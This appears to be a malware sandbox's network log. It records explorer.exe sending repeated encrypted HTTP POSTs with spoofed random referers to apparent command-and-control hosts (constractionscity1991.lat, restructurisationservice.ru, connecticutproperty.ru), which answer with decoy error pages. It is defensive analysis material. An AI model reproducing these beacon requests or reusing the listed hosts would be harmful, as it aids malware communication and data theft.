                                                                                                                        Date: Thu, 19 Dec 2024 06:52:53 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 150
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        4192.168.2.74994294.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:53:58.682049990 CET283OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://hrhyeqldvhuev.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 168
                                                                                                                        Host: constractionscity1991.lat
                                                                                                                        Dec 19, 2024 07:53:58.684093952 CET168OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be fb 55 5a 92
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)UZ2qIuT&E+-:=T%pq`miLE['_3R;)
                                                                                                                        Dec 19, 2024 07:54:00.220526934 CET595INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:53:59 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        5192.168.2.74994894.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:00.374161005 CET287OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://sgsvxfdiyvhaenj.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 133
                                                                                                                        Host: restructurisationservice.ru
                                                                                                                        Dec 19, 2024 07:54:00.374195099 CET133OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 96 2d 36 a8
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)-6NY'K{[_t}nQ4"?
                                                                                                                        Dec 19, 2024 07:54:02.938781977 CET597INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:02 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.749954194.85.61.76804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:03.070770979 CET283OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://esbcbgncmnjrnqow.com/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 131
                                                                                                                        Host: connecticutproperty.ru
                                                                                                                        Dec 19, 2024 07:54:03.070787907 CET131OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 90 56 28 81
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)V(%.of$a4\J[sE:<?B
                                                                                                                        Dec 19, 2024 07:54:04.411674023 CET300INHTTP/1.1 405 Not Allowed
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:04 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 150
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.74996094.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:04.702653885 CET285OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://kbqjcqfmijujbph.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 319
                                                                                                                        Host: constractionscity1991.lat
                                                                                                                        Dec 19, 2024 07:54:04.702670097 CET319OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 85 48 63 cd
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)Hc2G,rY+$0B&t &3.%F7HP^$<Kt1@m4onL,.X}kYi6qd%Q?Q,daQe L
                                                                                                                        Dec 19, 2024 07:54:06.078088045 CET595INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:05 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        8192.168.2.74996394.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:06.569564104 CET285OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://osytirdulvnll.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 287
                                                                                                                        Host: restructurisationservice.ru
                                                                                                                        Dec 19, 2024 07:54:06.569564104 CET287OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 93 45 73 db
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)Es*d4v#WvP$w\nWNB~Nomjb|7K/iXZ~1#mn@Rwk wI'iims[EcP14Bh_b@R
                                                                                                                        Dec 19, 2024 07:54:07.927191019 CET597INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:07 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        9192.168.2.749968194.85.61.76804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:08.055198908 CET280OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://lndihcelygbnm.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 261
                                                                                                                        Host: connecticutproperty.ru
                                                                                                                        Dec 19, 2024 07:54:08.055214882 CET261OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 9a 27 3b 8f
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)';0d=DKaH/=Le]m'x[S(sCxA\F,@?fp7o>eS;9(nCan&~nV,i*ocK@HLJu7Y
                                                                                                                        Dec 19, 2024 07:54:09.393615007 CET300INHTTP/1.1 405 Not Allowed
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:09 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 150
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        10192.168.2.74997394.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:09.730359077 CET282OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://almthodjcmij.org/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 350
                                                                                                                        Host: constractionscity1991.lat
                                                                                                                        Dec 19, 2024 07:54:09.730433941 CET350OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be be 54 39 ca
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)T9wqJ}_P;<Ls3,G@=Kz+NP~L}'Img6?qj{[6D' {+UsdV zo5f*Qt<y'jz`~u-A\W
                                                                                                                        Dec 19, 2024 07:54:11.099718094 CET595INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:10 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        11192.168.2.74997794.156.177.51804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:11.229300022 CET286OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://yrebwhkbvdffjj.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 252
                                                                                                                        Host: restructurisationservice.ru
                                                                                                                        Dec 19, 2024 07:54:11.229355097 CET252OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be f1 30 58 94
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)0XcYH)e9nZfOh4*y78<a|oXoGS>Lh^GoJ3eRglR<s7hbh4I5V:3LdNzp-&.
                                                                                                                        Dec 19, 2024 07:54:12.615632057 CET597INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 19 Dec 2024 06:54:12 GMT
                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: keep-alive
                                                                                                                        Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e [TRUNCATED]
                                                                                                                        Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        12192.168.2.749981194.85.61.76804056C:\Windows\explorer.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Dec 19, 2024 07:54:12.745742083 CET282OUTPOST / HTTP/1.1
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://uniikaknxvfyxea.net/
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Length: 176
                                                                                                                        Host: connecticutproperty.ru
                                                                                                                        Dec 19, 2024 07:54:12.745769024 CET176OUTData Raw: a1 5f 0e 5a f6 33 2a bb cc 3b a6 bc 89 c7 53 4e 54 35 c4 2e 6b c8 4b 55 ab 50 bf 69 7b f8 76 27 cf 57 d9 89 3d a4 01 4d 5c ca cd 03 a8 44 19 34 b2 66 7b 55 e2 62 2e 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be b6 1d 31 85
                                                                                                                        Data Ascii: _Z3*;SNT5.kKUPi{v'W=M\D4f{Ub.-^JrC)1$VEqUh9E|={gO#]63HL\okR^JCH}q}M^Mks1Vi.
                                                                                                                        Dec 19, 2024 07:54:14.086338997 CET300INHTTP/1.1 405 Not Allowed
                                                                                                                        Server: nginx
